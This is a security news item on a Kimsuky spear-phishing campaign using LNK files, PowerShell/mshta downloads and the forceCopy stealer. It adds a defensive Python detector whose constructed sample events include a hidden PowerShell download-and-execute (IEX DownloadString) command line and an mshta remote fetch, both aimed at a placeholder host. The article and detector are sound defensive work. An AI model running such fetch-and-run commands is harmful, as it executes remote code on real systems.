
The North Korean state-sponsored hacking group Kimsuky has launched a new spear-phishing campaign utilizing forceCopy, an advanced information-stealing malware, according to research from AhnLab Security Intelligence Center (ASEC).
The attack chain begins with phishing emails containing disguised Windows shortcut (LNK) files that appear as Microsoft Office or PDF documents. When opened, these files trigger PowerShell or mshta.exe to download additional malicious payloads.
Key components of the attack include:
– PEBBLEDASH trojan
– Modified version of RDP Wrapper
– Custom proxy malware for persistent communications
– PowerShell-based keylogger
– forceCopy stealer targeting browser data
The forceCopy malware specifically targets web browser installation paths, likely attempting to steal stored credentials and configuration files while bypassing security measures.
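The LNK-to-PowerShell/mshta download step described above is the part of this chain a defender can see in endpoint telemetry. The following is an added example, not code from ASEC, AhnLab, or the report they published: it triages process-creation events for a living-off-the-land binary launched in a shortcut context (parent explorer.exe or a .lnk referenced on the command line) whose command line also carries a remote-fetch or hidden-launch indicator. The field names loosely follow Sysmon Event ID 1, the events are constructed samples with a placeholder domain, and the indicator list is an assumption, not a list taken from the campaign.

```python
"""Triage constructed Windows process-creation events for the
LNK -> PowerShell/mshta download pattern.  Added example; the events below
are constructed, not logs from the Kimsuky campaign."""
import re
from dataclasses import dataclass

# Binaries the article names as the stage after the shortcut is opened.
LIVING_OFF_THE_LAND = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Assumed indicator set: a remote URL, common download cmdlets/tools,
# an encoded command, or a hidden window.  Tune to your environment.
DOWNLOAD_PATTERNS = [
    re.compile(r"https?://", re.I),
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin", re.I),
    re.compile(r"-enc(odedcommand)?\b", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
]


@dataclass
class ProcessEvent:
    image: str                 # full path of the new process (Sysmon "Image")
    parent_image: str          # full path of the parent ("ParentImage")
    command_line: str          # "CommandLine"
    parent_command_line: str = ""  # "ParentCommandLine"


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_reasons(ev):
    """Return the reasons an event matches the LNK download pattern, or []."""
    if basename(ev.image) not in LIVING_OFF_THE_LAND:
        return []
    launch_context = []
    if basename(ev.parent_image) == "explorer.exe":
        launch_context.append("launched from explorer.exe (double-clicked shortcut)")
    if ".lnk" in (ev.command_line + ev.parent_command_line).lower():
        launch_context.append("shortcut file referenced on the command line")
    indicators = [f"indicator /{p.pattern}/" for p in DOWNLOAD_PATTERNS
                  if p.search(ev.command_line)]
    # Both halves are required: an admin opening PowerShell from Explorer is
    # normal, and a script with a URL from a scheduler is normal; the pairing
    # of shortcut context and download behaviour is what the chain looks like.
    if launch_context and indicators:
        return launch_context + indicators
    return []


def triage(events):
    """Map event index -> reasons for every event that matches."""
    return {i: r for i, ev in enumerate(events) if (r := suspicious_reasons(ev))}


# Constructed sample telemetry (placeholder domain, not a real IoC).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell.exe -w hidden -c IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/stage2')"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta.exe http://example.invalid/doc.hta"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe", "powershell.exe Get-ChildItem C:\\"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\explorer.exe", r'"WINWORD.EXE" C:\Users\a\report.docx'),
    # Edge case: shortcut context but no download indicator -> not flagged.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe", "powershell.exe Get-Process"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

Only the first two constructed events are flagged; the benign PowerShell launches and the Word document are not. In production the same logic would consume Sysmon or EDR process-creation records, and the indicator list should be extended with whatever your environment's approved scripts never use.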
This campaign marks a strategic shift for Kimsuky, as the group moves away from custom backdoors in favor of RDP Wrapper and proxy tools for host control. The group, also known as APT43, operates under North Korea’s Reconnaissance General Bureau (RGB) and has been active since 2012.
Recent intelligence from Genians indicates that Kimsuky has been utilizing Russian services to distribute phishing messages for credential theft, demonstrating their continued evolution in attack methodologies.